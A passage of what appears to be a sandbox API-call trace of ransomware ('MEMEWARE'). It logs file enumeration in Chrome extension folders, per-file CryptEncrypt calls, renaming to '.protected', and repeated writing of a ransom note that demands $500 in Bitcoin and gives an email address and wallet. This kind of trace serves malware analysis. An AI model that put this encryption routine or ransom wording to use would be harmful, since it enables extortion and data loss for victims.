(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.173] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.173] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.173] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.173] CloseHandle (hObject=0x164) returned 1 [0081.173] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.173] lstrcmpiW (lpString1="ru", lpString2="Windows") returned -1 [0081.173] lstrcmpiW (lpString1="ru", lpString2="Program Files") returned 1 [0081.173] lstrcmpiW (lpString1="ru", lpString2="Program Files (x86)") returned 1 [0081.173] lstrcmpiW (lpString1="ru", lpString2="$Recycle.bin") returned 1 [0081.173] lstrcmpiW (lpString1="ru", lpString2="System Volume Information") returned -1 [0081.173] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru") returned 145 [0081.173] lstrcmpW (lpString1="ru", lpString2=".") returned 1 [0081.173] lstrcmpW (lpString1="ru", lpString2="..") returned 1 [0081.173] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\*") returned 147 [0081.173] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.174] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.174] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.174] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.174] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.174] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.174] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\.") returned 147 [0081.174] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.174] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.174] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.174] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.174] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.174] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.174] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.174] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\..") returned 148 [0081.174] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.174] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.174] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.174] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.174] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.174] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.174] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.174] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.174] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json") returned 159 [0081.174] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.174] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.174] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.174] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.175] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json") returned 159 [0081.175] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.175] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json") returned 159 [0081.175] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.175] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json") returned 159 [0081.175] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.175] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x30f, lpOverlapped=0x0) returned 1 [0081.176] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffcf1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.176] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x30f, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x30f, lpOverlapped=0x0) returned 1 [0081.177] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.177] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.177] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.177] CloseHandle (hObject=0x168) returned 1 [0081.177] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.protected") returned 169 [0081.177] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\messages.json.protected")) returned 1 [0081.178] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.178] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.178] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\RESTORE_FILES.txt") returned 163 [0081.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.179] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.179] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.180] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.180] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.180] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.180] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.180] CloseHandle (hObject=0x164) returned 1 [0081.180] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.180] lstrcmpiW (lpString1="sk", lpString2="Windows") returned -1 [0081.180] lstrcmpiW (lpString1="sk", lpString2="Program Files") returned 1 [0081.180] lstrcmpiW (lpString1="sk", lpString2="Program Files (x86)") returned 1 [0081.180] lstrcmpiW (lpString1="sk", lpString2="$Recycle.bin") returned 1 [0081.180] lstrcmpiW (lpString1="sk", lpString2="System Volume Information") returned -1 [0081.180] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk") returned 145 [0081.180] lstrcmpW (lpString1="sk", lpString2=".") returned 1 [0081.180] lstrcmpW (lpString1="sk", lpString2="..") returned 1 [0081.180] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\*") returned 147 [0081.180] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.180] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.180] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.181] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.181] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.181] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.181] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\.") returned 147 [0081.181] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.181] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.181] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.181] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.181] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.181] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.181] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.181] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\..") returned 148 [0081.181] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.181] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.181] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.181] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.181] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.181] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.181] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.181] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.181] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json") returned 159 [0081.181] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.181] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.181] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.181] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.185] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json") returned 159 [0081.185] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.185] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json") returned 159 [0081.185] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.185] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json") returned 159 [0081.185] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.185] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x29f, lpOverlapped=0x0) returned 1 [0081.187] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd61, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.187] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x29f, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x29f, lpOverlapped=0x0) returned 1 [0081.187] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.187] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.187] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.187] CloseHandle (hObject=0x168) returned 1 [0081.187] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.protected") returned 169 [0081.187] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.protected")) returned 1 [0081.188] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.188] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.188] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\RESTORE_FILES.txt") returned 163 [0081.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.189] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.189] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.190] lstrlenA 